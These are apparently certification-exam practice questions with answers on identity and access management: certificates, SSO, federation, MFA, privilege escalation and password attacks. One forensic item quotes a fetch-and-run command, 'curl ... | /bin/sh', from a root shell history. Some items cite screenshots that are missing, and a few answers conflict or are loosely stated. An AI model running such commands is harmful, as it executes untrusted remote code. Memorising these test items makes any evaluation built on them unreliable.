Chapter 8: Identity and Access Management Security (IAM)

Which of the following would be good for multiple domains and subdomains? A single-use certificate A (SAN) certificate An organization certificate A wildcard certificate

A (SAN) certificate

Which of the following is an entity that issues digital certificates? CLR AIA CDP CA

A certificate authority (CA) is an entity that issues digital certificates.

Which of the following describes a credential stuffing attack? A hacker tries a list of passwords on a single site. A hacker tries a list of credentials on multiple sites. A hacker tries to gain elevated privileges on a network. A hacker tries to get a user to click on a malicious link.

A hacker tries a list of credentials on multiple sites. A hacker trying a list of credentials on multiple sites is a credential stuffing attack. This often works because users use the same password for multiple sites.

You are monitoring network activity and find that a user appears to be logging into the network and downloading files, even though you know that user is on vacation. Which kind of attack have you MOST likely experienced? A vertical privilege escalation attack A brute force attack A horizontal privilege escalation attack A password stuffing attack

A horizontal privilege escalation attack A horizontal attack is when a user pretends to be a similar user on the same network.

Which of the following BEST describes Central Policy? An access management strategy where an attribute is created for every element of an organization's operations. An access management strategy where people are granted privileges based on their role in the organization. An authentication process that requires two or more steps. A program that checks for the correct attributes in an attribute-based system

A program that checks for the correct attributes in an attribute-based system. Central Policy is a program that checks for the correct attributes in an attribute-based system.

Which of the following BEST describes a rainbow table? Information about an organization's information systems. A table of passwords and the computed matching hashes. Malware programs that generate a hash for the program. A tool that can be used to pull information from social media postings.

A table of passwords and the computed matching hashes.

Which of the following BEST describes horizontal escalation? An attacker trying to access a user on the same system. An attacker trying a list of common passwords one after another. An attacker using a list of hacked credentials on a variety of sites. An attacker trying to access someone with higher privileges.

An attacker trying to access a user on the same system. An attacker trying to access a user on the same system is called horizontal escalation.

Which of the following certification types has the lowest level of certificate assurance? Extended Organization Domain Single-Use

Domain Domain validation is the lowest level of assurance. It has a padlock icon next to the domain and does not assure the site actually belongs to the business.

Which of the following is an advantage of setting up a federation? Employees have easier onboarding. Users must enter a PIN. Your organization is assigned a set of attributes. There is a preset database of users and their login credentials.

Employees have easier onboarding. There are many advantages to setting up a federation arrangement that make business operations smoother and more secure. These include: Easier employee onboarding Simpler end user experience Better user management

Which of the following is an example of IAM? File editing Entering a PIN Job position Clearance level

Entering a PIN Identity and access management (IAM) is something you likely encounter in your day-to-day life. You use IAM when you: Enter a PIN Scan a fingerprint Log into a website

Which of the following validation types requires an extensive verification process and shows a padlock, business name, and country code? Domain Organization Alternative Extended

Extended An extended validation is the strongest level of assurance. It requires an extensive verification process and shows a padlock, business name, and country code.

Which of the following is a trust relationship that exists between different organizations or applications? Federation Multi-factor authentication Assertion Identity and access management

Federation

Which of the following would BEST describe a multi-domain/subject alternative certificate? Good for multiple domains but no subdomains Good for a domain and all its subdomains Only good for one domain or subdomain Good for multiple domains and subdomains at a time

Good for multiple domains and subdomains at a time

Each user on a network must have a unique digital identity. Which of the following is this known as? Central Policy Identity and access management (IAM) Role-based access control (RBAC) Attribute-based access control (ABAC)

Identity and access management (IAM) Each user on a network must have a unique digital identity. This is known as identity and access management (IAM).

Your company has had a problem with users getting hacked even though you have established strong password policies. What is the next logical step to increase your company's security? Train the employees on the different types of hackers. Implement two or more methods of authentication. Purchase new computers for all your employees. Revise your company's password policy.

Implement two or more methods of authentication.

When performing an investigation into an intrusion through a Linux box on your network, you find the following command in /root/.bash_history: curl http://5.6.7.8/~/324526.sh | /bin/sh. What did this command do? It executed the 324526.sh script on a shell on the remote host 5.6.7.8, compromising that remote host. It executed the 324526.sh script locally as the root user. It copied the contents of the 324526.sh script into a new file called curl.sh, saving it for later execution. It replaced the /bin/sh command with the contents of the 324526.sh command

It executed the 324526.sh script locally as the root user. The curl command is used to fetch content from a remote location. In this case, it downloaded the 324526.sh script from the web server at the IP address 5.6.7.8 and piped it directly into /bin/sh, which executed it on the local machine. It ran as the root user since the command was found in the .bash_history file in the /root directory.

Which of the following BEST describes an organization validation? It shows a padlock icon next to the domain name. It shows a padlock icon, business name, and country code. It shows a padlock icon next to the company's name. It does not assure the site actually belongs to the business.

It shows a padlock icon next to the company's name.

Which of the following is a good way to prevent privilege escalation attacks? Delete event logs. Limit privileges. Obtain administrative privileges. Run administrative commands.

Limit privileges. By limiting the number of people who have privileges, you can make it more difficult for hackers to find someone vulnerable to impersonate. It's also easier to monitor a smaller pool of users who have advanced privileges.

You entered your password on a website and are sent a code to your cell phone. Which of the following is this an example of? SP SSO MFA IDP

MFA

You are tasked with changing the certificate authority to require that all requests be placed in the pending state until processed by an administrator. You have started certsrv (the certificate authority console) and are looking at the certificate authority's properties. Which tab would you select to change the way certificate requests are handled? Auditing Security Policy Module Enrollment Agents

Policy Module

As you review your network's storage shares to ensure permissions have been securely defined, you come across the following list of users and permissions set on a share at one of your key storage locations. Two of the regular users should have Read and Write permissions (Bob Barker and Jennifer Banks). The two other individuals (Joseph Lange and Bob Marley) should not; they were both given access during a specific project but should have had their Write permissions removed afterward. What is it called when permissions are given for a task but then never removed when they are no longer required? Account elevation Privilege creep Privilege elevation SAM database creep

Privilege creep The answer is privilege creep, which is the gradual accumulation of permissions beyond what a person requires to do their job.

Which of the following is a data protection approach that seeks to protect data at the file level? Central policy Privilege escalation Data loss prevention Rights management

Rights management

Which of the following allows users to sign into a single trusted account, such as Google or Facebook? SSO IDP SP SAML

Single sign-on (SSO) is a process that allows users to sign into a single trusted account, such as Google or Facebook.

Over time, changes in the way people use networks have complicated protecting a network against security threats. Which of the following trends has increased the need for security? (Select two.) Social networking Cloud computing Startup companies Privilege escalation Multi-factor authentication

Social networking Cloud computing

You are examining a company executive's laptop after they complained that someone was leaking confidential information to the internet. You type Ctrl+Alt+Shift+K and the following interface pops up. What has happened to the executive's machine? Someone has installed a web server that uploads all information from the laptop to Dropbox. The executive has a weak password and someone has guessed it. There is a Metasploit backdoor payload running on the computer. Someone has installed a keylogger on it.

Someone has installed a keylogger on it. The program displayed after pressing this key combination is called Refog. It is a keylogger. Someone has installed a keylogger on the machine and is capturing everything typed on the keyboard.

An attacker who gains access to your system can cause a lot of damage with a wide variety of malicious activities. Which of the following are malicious activities an attacker might use against your system? (Select two.) Save the event log. Steal confidential information. Limit user privileges. Access lower privilege users. Install malware on the system.

Steal confidential information. Install malware on the system.

Which of the following BEST describes a federation? -Determines the combination of attributes from users, objects, actions, and environment factors that are needed to perform any given action on a system. -Is an access management strategy where an attribute is created for every element of an organization's operations, such as for time, date, and location. -Stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them. -Is made up of components that include a user's account name and all the other attributes needed to start a session for the user.

Stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them. A federation stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them.

While performing a password audit on a Windows machine in your organization with L0phtCrack, you receive the following results. Based on what you see below, which two accounts should worry you the most? (Select two.) DefaultAccount Administrator Brandon Guest Mihai

The Administrator and Mihai accounts are most concerning. The Administrator account has full access to the machine and no password is currently set. The Mihai account has a simple password (apple) and was likely added as a user account on the system.

You have been asked to crack the password on a zip file for the CEO. The employee who sent it to the CEO told them the password over the phone, but the CEO forgot it, and the employee who knows the password is unavailable for the next week. You are using John the Ripper on Linux to recover the password. You transferred the file to your Linux machine and ensured that John the Ripper is installed, but you receive the following message. Which step did you skip? The hash has to be determined for the file. The only tools for password recovery on zip files run on Windows. The length of the password must be known. The encryption type has to be determined for the file.

The hash has to be determined for the file. John the Ripper does not crack encryption directly; it takes the hash of a file and tries candidate values against it to recover the password. In other words, the correct answer is to determine the hash of the file so that John the Ripper knows which methods to try.

A Windows web server that was reported as being compromised has been scanned, patched, and appears to be running properly with no indications that it is still compromised. The server is back in production, but users are complaining that they receive certificate errors when connecting to it. You did not perform the quarantine on the machine (a coworker did). They also performed the patching and scanning before putting it back to work in production. What might be causing the certificate errors? The server certificate was revoked since the private key may have been compromised. The server certificate has been moved to Pending Requests in the CA and not moved back. The web service is misconfigured. The server certificate was moved to Failed Requests in the CA until an audit can be made.

The server certificate was revoked since the private key may have been compromised. The most likely cause of this situation is that the coworker revoked the server certificate since the private key has probably been compromised.

You are testing for password vulnerability and used the command below to probe a Linux machine on your network. You then received the output below in return. Prior to the test, you scanned the IP to ensure that the SSH port was open. Now when you scan the same IP from a different machine, you see it's still open and that SSH connections are accepted from other IP addresses. Which of the following would MOST likely explain what has happened? The target server's firewall has stopped all traffic to prevent a security breach. The SSH service has stopped running to protect itself from the attack. The syntax is wrong and should include the "--time-delay 60" syntax. The target server is using Fail2Ban and has started refusing connections from the source

The target server is using Fail2Ban and has started refusing connections from the source IP address.

Which of the following BEST describes signing in without single sign-on? The website provides an extra layer of security to an account. The website uses more than one way to authenticate a user. The website must have its own database of user credentials. The website does not have to check its database for user credentials.

The website must have its own database of user credentials.

Which of the following BEST describes signing in with single sign-on? The website verifies the credentials in its database. The website uses more than one way to authenticate a user. The user is required to enter a security code. The website's authentication server verifies the credentials.

The website's authentication server verifies the credentials. With single sign-on, a website does not have to check its database for user credentials. It relies on a third party, such as Google or Facebook, for authentication.

An attacker has performed a privilege escalation attack on your system. Which of the following is MOST likely the goal behind this attack? To delete access to event logs. To limit user privileges. To check for system vulnerabilities. To lay a foundation for later.

To lay a foundation for later. Privilege escalation attacks are often laying the foundation for a larger cyberattack. They use these kinds of attacks so that they can have the proper privileges to carry out a successful breach.

While looking at user logs you notice a user has been accessing items they should not have rights to. After speaking to the user, you believe your system may have experienced an attack. Which type of attack has the system MOST likely experienced? Brute force attack Password stuffing Vertical privilege escalation Horizontal privilege escalation

Vertical privilege escalation This scenario is most likely a vertical privilege escalation attack. This type of attack deals with a user trying to get higher rights than they usually have.

You are working for a company that has one domain and multiple subdomains. Which certificate type would you need? Wildcard Single-use Multi-domain Organization

Wildcard

You are monitoring your network's traffic, looking for signs of strange activity. After looking at the logs, you see that there was a recent spike in database read volume. Could this be a problem and why? Yes. A spike in database read volume can show that a hacker has downloaded a great deal of information from the database. Yes. A spike in database read volume can show that someone is trying to use a brute force attack. No. A spike in database read volume is a normal occurrence that is not suspicious. No. A spike in database read volume is only a problem if it happens multiple times in a short period.

Yes. A spike in database read volume can show that a hacker has downloaded a great deal of information from the database. A spike in database read volume can show that a hacker has downloaded a great deal of information from the database, which can be used to injure the organization.

You are looking through your network usage logs and notice logins from a variety of geographic locations that are far from where your employees usually log in. Could this be a problem and why? Yes. Logins from strange geographical locations can show that your own employees are trying to hack you. No. Logins from strange geographical locations often happen from employees working remotely. Yes. Logins from strange geographical locations can show that a hacker is trying to gain access from a remote location. No. Logins from strange geographical locations happen when data is sent to distant servers.

Yes. Logins from strange geographical locations can show that a hacker is trying to gain access from a remote location.

Your network has been subject to a variety of network attacks and you are currently monitoring the user logs for suspicious activity, yet further attacks are still occurring. Which additional step could you take to increase network security? You could regularly scan your system for vulnerabilities. You could obtain administrator privileges. You could grant users more privileges. You could regularly delete event logs.

You could regularly scan your system for vulnerabilities. You should regularly scan your system for vulnerabilities; this will help you understand how hackers are getting into your system.

A password spraying attack is MOST like which of the following attack types? a brute force attack a privilege escalation attack a directory traversal attack a phishing attack

a brute force attack
